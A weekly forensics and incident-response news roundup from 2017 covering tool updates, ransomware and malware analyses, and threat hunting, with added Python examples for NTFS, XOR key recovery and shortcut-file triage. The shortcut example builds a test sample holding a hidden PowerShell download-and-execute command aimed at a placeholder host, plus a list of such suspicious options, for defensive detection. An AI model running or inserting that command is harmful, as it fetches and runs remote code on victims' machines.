Week 5 – 2017

Nominations for the 2017 Forensic 4:cast Awards are still open! If you’d like to nominate this site for blog of the year, that would be greatly appreciated 🙂
2017 Forensic 4:cast Awards – Nominations are Open


  • Didier Stevens updated his zipdump Python script to version 0.0.5, adding the “-E option value with # to count and group”.
    Update: zipdump.py Version 0.0.5

  • The update to Oxygen Forensic Detective (v9.1.2) was announced on Twitter last week but more information was released in a blogpost on their blog. The update improves the Export Engine and SIM card data extraction, “supports 2,700+ apps versions and 15,500+ devices”, and adds Google Chrome data parsing.
    Oxygen Forensic Detective extracts vital information from Google Chrome!
  • Berla updated iVe to version 1.10.6. “This release adds additional support for BMW brands of vehicles and brings the supported vehicle count to over 6,000 models. It also includes the highly anticipated new Timeline features”. The supported vehicle lookup feature was also improved so that it can be updated independently of the desktop application.
    iVe v1.10 Released
  • Phil Harvey updated ExifTool to version 10.41 (development release), adding additional tags and bug fixes, as well as “an experimental metadata validation feature”.
    Feb. 1, 2017 – Version 10.41
  • MISP 2.4.63 has been released, including bug fixes and new features such as “allowing fetching of full discussion threads via the API, [and] add and remove tags from objects by uuid (in addition to the id).”
    MISP 2.4.63 released
  • Elcomsoft eXplorer for WhatsApp has been updated to version 2.0, adding Android support. “In addition, Elcomsoft Explorer for WhatsApp 2.0 includes a number of bug fixes and improvements, adds support for iTunes [backups] made with the latest versions of iTunes for the latest versions of iOS up to and including 10.2, and extracts information about video calls available in the latest versions of WhatsApp”. Oleg Afonin has also written a post on how to use the tool to extract WhatsApp data from Android devices.
    Elcomsoft eXplorer for WhatsApp Gets Android Support
  • Logicube released an update for their Falcon product, now at version 3.1. The update improves the imaging and hashing features and includes various bug fixes.
    Forensic Falcon

  • X-Ways Forensics 19.1 SR-2 was released with minor improvements and bug fixes.
    X-Ways Forensics 19.1 SR-2

  • Evimetry was updated to version 2.1.5 with a couple of bug fixes and improved multi-lingual support.
    Release 2.1.5

  • GetData updated both Forensic Explorer and Mount Image Pro this week.


  • John Moran at Solutionary introduces a new tool called ELMO, which “is a command line tool written in VB.NET that is intended to take the scripting functionality of a Windows batch file to the next level”. ELMO is a triage tool that allows the examiner to string multiple tools together and capture the output.
    ELMO for Incident Response


  • Jessica Hyde at Magnet Forensics will be hosting a 1 hour webinar on “new methods for discovering and parsing data from these unsupported applications”. Viewers will “learn how to test, find, parse, and script to obtain forensic evidence in new applications using a physical forensic image”. The webinar will take place 29th March 2017, 9AM (GMT-5, 2PM GMT).
    Methods for parsing new applications



  • Jim Hoerricks at Amped shows how Amped Authenticate and Amped DVRConv can be used to assist an (insurance) investigation. “Amped Authenticate provides a suite of different tools to determine whether an image is an unaltered original, an original generated by a specific device, or the result of a manipulation with a photo editing software and thus may not be accepted as evidence”. DVRConv can convert proprietary video files into a standard format.
    Insurance companies look to forensics to cut fraud and abuse – and save time

  • CyberForensicator shared a number of links this week
  • Didier Stevens has identified that Dropbox stores some information in Alternate Data Streams and shows how to extract it (although he was unable to determine what the data is).
    Quickpost: Dropbox & Alternate Data Streams

  • Vladimir Katalov at Elcomsoft explains how to jailbreak an iOS 10 device using the Yalu102 jailbreak and then perform a physical acquisition with the latest iOS Forensic Toolkit.
    iOS 10 Physical Acquisition with Yalu Jailbreak

  • Matt Bromiley continues the Zeltser challenge, but only put out one post this week. This post provides a brief overview of the $AttrDef file and then explores the attributes that are most commonly used during an examination.
    A Journey into NTFS: Part 4
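As a companion to the $AttrDef overview above, here is an added example (not code from Matt's post) that parses the file's 160-byte records and uses the size limits it defines as a sanity check on attributes seen in MFT records. The record layout follows the public NTFS documentation; the sample $AttrDef is constructed inline from three well-known entries rather than read from a real volume, and the min/max sizes in it are the commonly documented values.

```python
"""Parse the NTFS $AttrDef file, which defines every attribute type a
volume supports. Added example, not code from the post above; the
160-byte record layout follows the public NTFS documentation and the
sample $AttrDef is constructed inline rather than read from a volume.
"""
import struct
from typing import Optional

ENTRY_SIZE = 0xA0
# label (UTF-16LE, 128 bytes), type, display rule, collation rule, flags, min size, max size
ENTRY_FMT = "<128sIIIIQQ"
FLAGS = {0x02: "INDEXED", 0x40: "ALWAYS_RESIDENT", 0x80: "MAY_BE_NONRESIDENT"}


def parse_attrdef(data: bytes) -> list:
    """Walk the fixed-size records until the zero-filled terminator."""
    entries = []
    for off in range(0, len(data) - ENTRY_SIZE + 1, ENTRY_SIZE):
        label, atype, display, collation, flags, lo, hi = struct.unpack_from(ENTRY_FMT, data, off)
        if atype == 0:                       # an all-zero record ends the table
            break
        entries.append({
            "name": label.decode("utf-16-le").rstrip("\x00"),
            "type": atype,
            "display_rule": display,
            "collation_rule": collation,
            "flags": [n for bit, n in sorted(FLAGS.items()) if flags & bit],
            "min_size": lo,
            "max_size": hi,
        })
    return entries


def lookup(entries: list, atype: int) -> Optional[dict]:
    """Find the definition for an attribute type code (e.g. 0x30 for $FILE_NAME)."""
    return next((e for e in entries if e["type"] == atype), None)


def size_in_range(entries: list, atype: int, length: int) -> Optional[bool]:
    """Sanity check for an attribute seen in an MFT record: None if the type is
    not defined on this volume, else whether its length respects $AttrDef's limits."""
    e = lookup(entries, atype)
    if e is None:
        return None
    return e["min_size"] <= length <= e["max_size"]


def build_entry(name: str, atype: int, flags: int, min_size: int, max_size: int) -> bytes:
    """Assemble one record; used here only to construct the sample table."""
    return struct.pack(ENTRY_FMT, name.encode("utf-16-le").ljust(128, b"\x00"),
                       atype, 0, 0, flags, min_size, max_size)


# constructed sample: three entries with their commonly documented limits, plus the terminator
SAMPLE_ATTRDEF = b"".join([
    build_entry("$STANDARD_INFORMATION", 0x10, 0x40, 0x30, 0x48),
    build_entry("$FILE_NAME", 0x30, 0x42, 0x44, 0x242),
    build_entry("$DATA", 0x80, 0x80, 0, 0xFFFFFFFFFFFFFFFF),
]) + b"\x00" * ENTRY_SIZE


if __name__ == "__main__":
    for e in parse_attrdef(SAMPLE_ATTRDEF):
        print(f"{e['type']:#06x} {e['name']:<24} flags={e['flags']} "
              f"size={e['min_size']}..{e['max_size']}")
```

On a real volume, feed `parse_attrdef` the contents of MFT record 4 (`$AttrDef`); an attribute whose type code is absent from the table, or whose length falls outside the defined limits, is worth a second look.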

  • Maxim Suhanov has published a whitepaper to his GitHub examining the reliability of hardware write blockers. Maxim explains that software write blockers such as Paladin (versions 4.01 and 6.01 were tested; the current version is 7.02) and various Tableau hardware write blockers may still write to drives in specific circumstances, despite being “write blocked”.
    Are hardware write blockers more reliable than software ones?

  • Dan Pullega at 4n6k shows how to “copy files directly from a Volume Shadow Copy on a live, remote machine”. In testing Dan used a Win7 VM; others have been unsuccessful when trying to replicate it on Win10.
    Forensics Quickie: Accessing & Copying Volume Shadow Copy Contents From Live Remote Systems
  • Digital Forensics Corp shared a number of articles this week
  • Will Ascenzo at Gillware Digital Forensics has a writeup of a recent case involving an unsupported mobile device. Unfortunately, the only way through the locked device was out of reach of the local police department, and the data had to be read directly from the chip. Will explains that the chip was removed, imaged and verified, and the resultant data was returned to the police to continue their investigation.
    Forensic Case Files: HTC One Mobile Chip-Off Forensics
  • Will has also posted a writeup of some recent work done by one of their forensic data recovery specialists, Cody, where a user’s data was encrypted with the Nemucod ransomware. Cody was able to carve an unencrypted version of a file that had been encrypted, which was then used with a free decryptor tool to obtain the XOR key.
    Nemucod Data Recovery Case Study: Recovering Data from Ransomware
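The recovery described above is a known-plaintext attack on a repeating XOR key. As an added example (not Gillware's tooling or the decryptor they used), the following shows the general method: derive the key from one carved original and its encrypted twin, verify that the key really repeats across the whole overlap, and then decrypt a second file. The 255-byte key length and the 2048-byte encrypted prefix are assumed parameters, not taken from the page, and both sample “files” are constructed inline so it runs offline.

```python
"""Known-plaintext recovery of a repeating XOR key.

Added example for the Nemucod case above; it is not Gillware's tooling or
the decryptor they used. KEY_LEN and PREFIX_LEN are assumed parameters,
and both sample files are constructed inline.
"""
import random
from typing import Optional

KEY_LEN = 255        # assumed key length
PREFIX_LEN = 2048    # assumed: only the first 2048 bytes of each file are XORed


def xor_prefix(data: bytes, key: bytes, prefix_len: int = PREFIX_LEN) -> bytes:
    """XOR the first prefix_len bytes with the repeating key; the rest is untouched.
    The same routine encrypts and decrypts."""
    head = bytes(b ^ key[i % len(key)] for i, b in enumerate(data[:prefix_len]))
    return head + data[prefix_len:]


def recover_key(plain: bytes, cipher: bytes, key_len: int,
                prefix_len: int = PREFIX_LEN) -> bytes:
    """Derive the key from one carved original and its encrypted twin.

    Every byte of the overlap is checked, so a key that does not really
    repeat with period key_len is rejected instead of silently returned."""
    n = min(len(plain), len(cipher), prefix_len)
    if n < key_len:
        raise ValueError(f"need at least {key_len} overlapping bytes, have {n}")
    key = bytes(plain[i] ^ cipher[i] for i in range(key_len))
    for i in range(key_len, n):
        if plain[i] ^ cipher[i] != key[i % key_len]:
            raise ValueError(f"no repeating key of length {key_len}: mismatch at offset {i}")
    return key


def find_key_length(plain: bytes, cipher: bytes, max_len: int = 512) -> Optional[int]:
    """Brute-force the period when it is not known: the shortest length for
    which the keystream is consistent across the whole overlap wins."""
    for key_len in range(1, max_len + 1):
        try:
            recover_key(plain, cipher, key_len)
            return key_len
        except ValueError:
            continue
    return None


def recover_and_decrypt(plain: bytes, cipher: bytes, target: bytes) -> bytes:
    """End to end: learn the key from one known pair, decrypt another file."""
    key_len = find_key_length(plain, cipher)
    if key_len is None:
        raise ValueError("no repeating XOR key found")
    return xor_prefix(target, recover_key(plain, cipher, key_len))


# ---- constructed sample data (not real victim files) ----
_rng = random.Random(4)
SAMPLE_KEY = bytes(_rng.getrandbits(8) for _ in range(KEY_LEN))
CARVED_ORIGINAL = b"%PDF-1.4\n" + b"Invoice 2017-01 line item\n" * 200      # the file carved unencrypted
OTHER_ORIGINAL = b"PK\x03\x04" + bytes(_rng.getrandbits(8) for _ in range(4000))  # a second file, unknown
ENCRYPTED_CARVED = xor_prefix(CARVED_ORIGINAL, SAMPLE_KEY)
ENCRYPTED_OTHER = xor_prefix(OTHER_ORIGINAL, SAMPLE_KEY)


if __name__ == "__main__":
    print("key length:", find_key_length(CARVED_ORIGINAL, ENCRYPTED_CARVED))
    recovered = recover_and_decrypt(CARVED_ORIGINAL, ENCRYPTED_CARVED, ENCRYPTED_OTHER)
    print("second file decrypted correctly:", recovered == OTHER_ORIGINAL)
```

The consistency check in `recover_key` is the part worth keeping: with only the first `key_len` bytes you would get a plausible-looking key from any pair of files, and the mismatch offset it reports is what tells you the carved file is not actually the original of the encrypted one.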

  • Mark McKinnon introduces an Autopsy plugin that parses Mac OSX Safari data.
    Mac OSX Safari Autopsy Plugin
  • Jonathon Poling at Ponder The Bits continues his examination of the .DS_Store files located in the OS X Trash folder, exploring why the artefacts are recreated even if the Trash is emptied. Jonathon works through a few hypotheses but at the end is still left with a number of questions regarding why this activity occurs.
    Mac Dumpster Diving – Identifying Deleted File References in the Trash (.DS_Store) Files – Part 2
  • David Dym at Easy Meta Data has a post explaining a bug in Mac OS (OS X 10.4+) that changes the modification date of a FAT32 Volume Label: if a Volume Label is set on a FAT32 volume, its modification date is updated to the time the volume was connected. David Cowen also mentioned this on last week’s Forensic Lunch.
    Funny Mac Behavior With Fat32 Volume Label Mod Dates

  • Stephanie Archibald at Cylance has been conducting some research “around the execution of multi-stage payloads on macOS (up to Sierra)”. Stephanie shows how to locate the dynamic loader, dyld, and subsequently the executable in memory.
    Running Executables on macOS From Memory
  • The Blackbag Training Team continues their Windows Forensic Essentials Blog Series, this time looking at Volume Shadow Copies. They explain the basics of VSCs and then show how to use Blacklight to process and review data held within them.
    An Overview: Windows Volume Shadow Copies

  • The new Bluetooth Security project team has taken over the reins from last year’s team, continuing the previous team’s research into BtleJuice and BlueHydra.
    Bluetooth Security Forensics
  • The Arsenal Consulting Twitter account shared a few interesting tweets on the hibernation file, and advise that they will be compiling their findings shortly. They also updated their “odatv Case Study w/ weaponized emails sent to journalist Müyesser Yıldız’s personal email”.


  • There were a few posts by the guys at Fortinet
    • Artem Semenchenko has an update on the previous work done on the Shamoon malware. Newer versions of Shamoon (also known as DistTrack) have updated the size of the picture used when overwriting files, have different compilation times, and can “now also target both physical and virtual machines” using the additional hardcoded credentials.
      Saudi Organizations Targeted by Resurfaced Shamoon Disk-Wiping Malware
    • Raul Alvarez walks through how the Petya ransomware affects the boot process.
      Ransomware And The Boot Process
    • Floser Bacurio, Joie Salvio, and Rommel Joven take a look at the “notable characteristics [of the Sage 2.0 ransomware], and provide some simple ways to mitigate it”. The malware is downloaded using either a Word document or JavaScript (which, depending on the URL, may download different types of ransomware). The malware maintains persistence with a LNK file in the Startup folder, and spawns multiple processes that watch each other to ensure they are constantly running. “It also skips any file encryption if the file “C:\Temp\lol.txt” is found in the system” (protip: create C:\Temp\lol.txt on all your machines to avoid infection by the current versions).
      A Closer Look at Sage 2.0 Ransomware along with Wise Mitigations
  • There were a couple of articles of interest by the guys at Palo Alto Networks
  • Matt Aubert at Cisco shares the various tools and processes he uses to conduct malware analysis. He also made a YouTube video demonstrating how the various tools work to analyse a file.
    Malware Analysis for the Incident Responder

  • Mariano Graziano and Paul Rascagneres at Cisco’s Talos blog share their preliminary analysis of the EyePyramid malware. The sample is written in .NET and is heavily obfuscated, also implementing anti-sandbox and anti-debugging features. The authors were able to partially deobfuscate the malware, leading them to determine that it maintains persistence using the Run/RunOnce keys and modifies the firewall. The authors then continue to examine the malware covering the encryption used, network traffic, and exfiltration method.
    EyePyramid: An Archaeological Journey
  • The guys at IMF Security discuss “building a system to detonate Windows malware in order to evaluate the behavior and artifacts that are created”. The post covers building the system, configuring the network, setting up audit logging, capturing malware artefacts, and adding additional logging with sysmon.
    Building a Windows malware discovery lab or highly monitored system

  • Shusei Tomonaga at the Japan Computer Emergency Response Team Coordination Center “introduces techniques to deceive analysts by displaying incorrect information in the Import API, and measures to implement in PE analysis tools against the issue.” Their tool, pyimpfuzzy, “was updated with a new feature to compare INT and IAT, and only analyse the APIs that are actually imported.”
    Anti-analysis technique for PE Analysis Tools –INT Spoofing–
  • There were a couple of posts on the Microsoft Malware Protection Center Threat Research & Response Blog
    • Tommy Blizard shows how Windows Defender ATP detects the Cerber ransomware and the alerts that are generated.
      Averting ransomware epidemics in corporate networks with Windows Defender ATP
    • Duc Nguyen comments on a campaign that spreads malware using malicious LNK files in ZIP files. The latest iteration delivers more malware from more domains. “This new script has no less than five different hardcoded domains from which it attempts to download the payload malware. In addition to Locky, this script also now downloads Kovter”. “The .lnk file points to a command line containing the PowerShell script. Opening the shortcut file executes the PowerShell command”.
      Improved scripts in .lnk files now deliver Kovter in addition to Locky

  • The Malwarebytes Labs team examines the Locky Bart ransomware, which “has new features that are different from its predecessors” including faster encryption without the need for an Internet connection. The code is also protected using “WPProtect”. The authors then go on to examine the backend server application.
    Locky Bart ransomware and backend server analysis

  • Arsh Arora guest-posts on CyberCrime & Doing Time explaining that the Kelihos botnet spreads via flash media using a hidden copy of the original executable renamed to “porn.exe” as well as additional shortcut files.
    Kelihos infection spreading by Thumb Drive and continues geo-targeting
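Both the Microsoft post on .lnk-delivered Locky/Kovter above and the Kelihos thumb-drive write-up come down to shortcut files whose target or arguments launch something the user did not intend. The following is an added example, not code from either post: a minimal parser for the ShellLink header and StringData fields (layout per MS-SHLLINK) with a triage check that flags shortcuts launching PowerShell with the usual hidden-window, policy-bypass and download options. The sample shortcut is constructed inline, not a real malware sample, and the URL in it is a placeholder.

```python
"""Minimal Windows shortcut (.lnk) parser for triage.

Added example, not code from the posts above. It reads the ShellLink
header and StringData fields (layout per MS-SHLLINK) and flags shortcuts
whose target or arguments launch PowerShell with download-and-execute
options. The sample shortcut is constructed inline, not a real sample.
"""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each present only if its flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
SUSPICIOUS_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                      "-ep bypass", "-executionpolicy bypass", "-enc", "iex",
                      "downloadstring", "downloadfile")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut as a dict (plus the raw LinkFlags)."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    pos = 0x4C                                   # fixed 76-byte header
    if flags & HAS_ID_LIST:                      # LinkTargetIDList: u16 size, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo: u32 total size, including the size field
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, not byte count
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def triage(fields: dict) -> list:
    """Return the reasons a parsed shortcut looks like a script-launching lure."""
    reasons = []
    target = (fields.get("relative_path", "") + " " + fields.get("name", "")).lower()
    args = fields.get("arguments", "").lower()
    if "powershell" in target or "powershell" in args:
        reasons.append("launches PowerShell")
    reasons += [f"argument marker {m!r}" for m in SUSPICIOUS_MARKERS if m in args]
    return reasons


def build_lnk(rel_path: str, working_dir: str, arguments: str, id_list: bytes = b"") -> bytes:
    """Assemble a shortcut from its StringData; used here only to construct test input."""
    flags = HAS_REL_PATH | HAS_WORKING_DIR | HAS_ARGS | IS_UNICODE | (HAS_ID_LIST if id_list else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)   # attrs=ARCHIVE, ShowCommand=7 (minimised)
    body = struct.pack("<H", len(id_list)) + id_list if id_list else b""
    for s in (rel_path, working_dir, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# constructed sample: a shortcut that runs a hidden, policy-bypassing PowerShell downloader
SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows",
    "-nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://payload.invalid/a.ps1')\"",
    id_list=b"\x00" * 12,    # placeholder IDList; real ones carry shell item IDs
)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print(info["relative_path"], info["arguments"])
    print(triage(info))
```

A detail that bites in practice: `CountCharacters` is a character count, so a Unicode shortcut's strings occupy twice as many bytes, and reading them with the wrong width lands the parser in the middle of the next field. The ShowCommand value (7 here, minimised) is also worth recording during triage, since lures routinely set it so the console never appears on screen.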
  • Didier Stevens at NVISO Labs analyses “a sample that was quarantined by GFI Cloud anti-virus”. He recommends using “the quarantine files directly for analysis, rather than restoring the quarantined file through the anti-virus management console”, and that the hash located in the accompanied XML file can be used to look up the sample on scanning services such as VirusTotal.
    Working with GFI Cloud anti-virus quarantine files
  • The guys at ThreatGeek take a look at the GoldenEye ransomware, which is an evolution of the Petya-Mischa ransomware. The malware is delivered through a maldoc and then encrypts the user’s files. The malware also installs its own bootloader, and moves and XORs the existing one.
    Spying on GoldenEye Ransomware
  • Brian Bartholomew at Securelist examines a maldoc that drops a .JS backdoor used by the Turla malware. “While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection”. “The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript”. The malware stores itself in a nested folder under the user’s local AppData, as well as in Temp, and maintains persistence with the Run key.
    KopiLuwak: A New JavaScript Payload from Turla

  • Winston M analyses a maldoc which generates a PowerShell script to drop an executable. This executable was then run, bypassing UAC “through manipulating eventviewer and mmc Registry”. This is a technique previously shown by Matt Nelson.
    “Newborn Macro Malware” generates PowerShell script from VBScript to drop an executable – This time with UAC Bypassing skills !!
  • Ismael Valenzuela and Marc Rivero’s post on the SANS ISC Handler Diaries also comments on a sample that uses Matt Nelson’s technique for bypassing UAC. As effective as this is, the original post explains that the remediation is to remove the “current user from the Local Administrators group”.
    Malicious Office files using fileless UAC bypass to drop KEYBASE malware


  • Kris Merritt at Vector8 describes the three forms of hunting as “Retrospective Discovery, Artifact Discovery, [and] Pattern Discovery”. Retrospective discovery is looking for known threats after they’ve been identified (e.g. in a threat feed). Artifact discovery is “discovering novel threat artifacts” by performing disk/memory/network based forensics. The third, “Pattern discovery, reveals the behavior, method, or tactic of attacker activity, not just the artifacts left behind by an attack”. Kris also provides a definition of hunting as “the discovery of malicious artifacts, patterns, or detection methods not accounted for in passive monitoring capabilities.”
    What on Earth is hunting anyway?

  • Josh Liburdi explains the difference between threat hunting and “detection via an automated system”. He also shares a high level overview of how he conducts a hunt.
    Threat Hunting Basics

  • Jack Crook at DFIR and Threat Hunting shares his thoughts on an article by Hayden Hainsworth at Microsoft on understanding the adversary’s toolkit. Jack explains that the author “does a good job of describing some of the tools and methods that may be employed by an attacker, but falls short when it comes to discussing how to find indications of this behavior” and then progresses to explain what “net use”, “net group” and mimikatz might look like to a defender.
    Hunting: What does it look like?
  • Seth Polley’s whitepaper was published on the SANS InfoSec Reading Room. The paper “evaluate[s] and compare[s] tools that can be used to audit Windows hosts, analyze phishing emails at depth utilizing a multifaceted approach, and search for user-initiated compromises that a security stack can fail to identify. By identifying key Indicators of Compromise (IoCs), a company can begin detecting malicious activity and begin remediation in a timely manner, often within hours of the malware first being executed”.
    Dissect the Phish to Hunt Infections


  • Samuel Alonso at Cyber-IR shared the link and a brief summary of AboutDFIR
    The DFIR compendium portal
  • Jamie McQuaid explains the various types of keyword searching available in Axiom.
    Using Keywords with Magnet AXIOM

  • Oleg Davydov, CTO of Oxygen Forensics, posted an article on Forensic Focus showing how to send AT modem commands to temporarily remove the screen lock of an LG Android smartphone. Oleg explains that the method works in RAM and therefore doesn’t touch the ROM. The process has also been tested on a number of different LG devices (and now that it’s public, I’m sure it will be fixed soon).
    Unlocking The Screen of an LG Android Smartphone with AT Modem Commands
  • DFIR Guy at DFIR.Training shares his thoughts on saying “never” in DFIR. He advises that it is almost “always impossible to prove a negative without some other information outside the hard drive”. “It is easy to say “yes” when you find the artifacts in the system … but to say that something never happened is a risky path to take.”
    ‘Yes’ means ‘yes’. But ‘no’ could mean ‘maybe’ or ‘maybe not’, but ‘no’ never means ‘never’.
  • Daniel G at 43nsicbot shows “how to setup an endpoint detection lab using sysmon, windows auditing and the free version of Splunk.”
    ED without the R Lab Setup

  • Richard Kiper’s whitepaper was posted on the SANS InfoSec Reading Room. The aim of the paper was “to identify the most effective instructional design features for a future entry-level digital forensics course” and led to the “Digital Forensics Framework for Instruction Design (DFFID)”. DFFID is “a comprehensive digital forensics instructional framework meant to guide the development of future digital forensics curricula”. I like the recommendation at the end for creating intermediate or expert level courses – I’ve taken subjects at various universities on digital forensics and found that they’re generally directed at people looking to get into the field – one even used a vendor’s beginner level training package as part of the assessment.
    Forensication Education: Towards a Digital Forensics Instructional Framework
  • Lesley Carhart answers readers questions. Regarding DFIR, she advises that a physical checklist is useful in avoiding coming to conclusions because one case is similar to another. “Shortcuts and assumptions are incredibly dangerous to the legal and technical validity of investigations. Gather all the facts available to you at the time, and document every step you take so that a colleague (or a legal professional) can follow your work even far in the future”.
    Ask Lesley InfoSec Advice Column: 2017-01-30

  • The Journal of Cloud Computing is looking for papers, with a CFP closing 01 March, 2017. More information can be found here.
  • Ken Pryor recommends people head over to the 4:cast awards nomination site!
    2017 Forensic 4:cast Awards Nominations are Open!

And that’s all for Week 5! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!
